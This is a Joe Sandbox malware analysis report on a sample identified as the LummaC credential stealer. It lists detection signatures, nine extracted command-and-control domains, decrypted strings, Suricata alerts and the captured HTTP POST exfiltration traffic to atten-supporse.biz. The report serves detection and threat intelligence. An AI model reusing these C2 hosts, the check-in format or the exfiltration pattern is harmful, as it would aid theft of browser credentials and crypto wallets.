Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1571976
MD5:	1cfa4d3434f4056fd9d63f5c16c73c76
SHA1:	6c86f5fb5062e2037b6baf1701230bff249f89f7
SHA256:	49d35e116cb2a602f6f457f4003e0247c283b7e659f9f78022e102a25307acb1
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 5632 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1CFA4D3434F4056FD9D63F5C16C73C76)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["se-blurry.biz", "zinc-sneark.biz", "atten-supporse.biz", "covery-mover.biz", "formy-spill.biz", "dare-curbys.biz", "impend-differ.biz", "dwell-exclaim.biz", "print-vexer.biz"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2259071375.0000000001006000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2212521763.0000000001005000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2235655968.0000000001002000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2259012497.0000000001006000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2190452514.0000000001001000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2235678317.0000000001005000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2212421747.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2212500277.0000000001002000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2261414653.0000000001009000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 5632	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 5632	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 7 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T23:25:09.232918+0100	2028371	3	Unknown Traffic	192.168.2.6	49707	104.21.112.1	443	TCP
2024-12-09T23:25:11.534432+0100	2028371	3	Unknown Traffic	192.168.2.6	49709	104.21.112.1	443	TCP
2024-12-09T23:25:13.726992+0100	2028371	3	Unknown Traffic	192.168.2.6	49710	104.21.112.1	443	TCP
2024-12-09T23:25:16.010614+0100	2028371	3	Unknown Traffic	192.168.2.6	49711	104.21.112.1	443	TCP
2024-12-09T23:25:18.470445+0100	2028371	3	Unknown Traffic	192.168.2.6	49713	104.21.112.1	443	TCP
2024-12-09T23:25:20.850654+0100	2028371	3	Unknown Traffic	192.168.2.6	49719	104.21.112.1	443	TCP
2024-12-09T23:25:23.396773+0100	2028371	3	Unknown Traffic	192.168.2.6	49727	104.21.112.1	443	TCP
2024-12-09T23:25:27.664935+0100	2028371	3	Unknown Traffic	192.168.2.6	49744	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T23:25:09.951463+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49707	104.21.112.1	443	TCP
2024-12-09T23:25:12.257382+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49709	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T23:25:09.951463+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49707	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T23:25:12.257382+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49709	104.21.112.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T23:25:09.232918+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.6	49707	104.21.112.1	443	TCP
2024-12-09T23:25:11.534432+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.6	49709	104.21.112.1	443	TCP
2024-12-09T23:25:13.726992+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.6	49710	104.21.112.1	443	TCP
2024-12-09T23:25:16.010614+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.6	49711	104.21.112.1	443	TCP
2024-12-09T23:25:18.470445+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.6	49713	104.21.112.1	443	TCP
2024-12-09T23:25:20.850654+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.6	49719	104.21.112.1	443	TCP
2024-12-09T23:25:23.396773+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.6	49727	104.21.112.1	443	TCP
2024-12-09T23:25:27.664935+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.6	49744	104.21.112.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T23:25:07.769238+0100	2057921	1	Domain Observed Used for C2 Detected	192.168.2.6	55011	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T23:25:21.579589+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49719	104.21.112.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://atten-supporse.biz/B	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/apiF	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/api66	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/v8	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/api)	Avira URL Cloud: Label: malware

Found malware configuration

Source: file.exe.5632.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["se-blurry.biz", "zinc-sneark.biz", "atten-supporse.biz", "covery-mover.biz", "formy-spill.biz", "dare-curbys.biz", "impend-differ.biz", "dwell-exclaim.biz", "print-vexer.biz"], "Build id": "LOGS11--LiveTraffic"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: impend-differ.biz
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: print-vexer.biz
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: dare-curbys.biz
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: covery-mover.biz
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: formy-spill.biz
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: dwell-exclaim.biz
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: zinc-sneark.biz
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: se-blurry.biz
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: atten-supporse.biz
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.2140898780.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LOGS11--LiveTraffic

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000C6B7E CryptUnprotectData,

0_2_000C6B7E

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49727 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]	0_2_000D6170
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then push eax	0_2_000BC36E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh	0_2_000EE690
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]	0_2_000DC6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_000DC6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]	0_2_000DC6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]	0_2_000DC6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]	0_2_000BA960
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_000EDBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_000B9CC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh	0_2_000EDCF0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edx], bl	0_2_000BCE55
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_000C7E82
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]	0_2_000DBFDA
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]	0_2_000DBFD3
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]	0_2_000D5F7D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_000DA060
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_000CD074
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_000DD085
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_000DD085
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_000CD087
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_000C7190
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [000F4284h]	0_2_000D5230
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, eax	0_2_000D2270
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi+ebx], 00000000h	0_2_000BC274
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]	0_2_000D92D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ebx	0_2_000D92D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_000D7307
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, bx	0_2_000D536C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_000DB3DE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_000DB3DE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_000DB475
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_000B7470
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_000B7470
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_000DB4BB
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_000E45F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_000DA630
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]	0_2_000D7653
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]	0_2_000D96D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp al, 2Eh	0_2_000D66E7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_000D86F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_000D0717
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_000D0717
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_000C6E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, eax	0_2_000C6E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, eax	0_2_000B5910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebp, eax	0_2_000B5910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	0_2_000D5920
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_000D86F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_000C597D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_000ECAC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_000C5ADC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_000DAAD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]	0_2_000E6B20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi]	0_2_000B2B70
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_000C9C10
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_000ECCE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_000ECD60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_000ECE00
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_000C6E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, eax	0_2_000C6E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h	0_2_000CCEA5
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]	0_2_000C5EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_000D1EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h	0_2_000C4F08
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, edx	0_2_000C4F08
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ebx, 03h	0_2_000D8F5D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]	0_2_000D5F7D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h	0_2_000EDFB0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.6:55011 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49713 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49707 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49710 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49709 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49711 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49727 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49719 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49744 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49707 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49707 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49719 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49709 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 104.21.112.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: atten-supporse.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: print-vexer.biz

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49727 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49719 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49744 -> 104.21.112.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NVWURIH7DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12811Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4QAMFM7G36V1CLGD16User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15111Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D4ST53SEUXIHADUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19945Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LBMLM2C9YDSTAUQ7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1216Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MEKP6SVXFRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571362Host: atten-supporse.biz

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: atten-supporse.biz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz

Source: file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2342603560.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro8
Source: file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
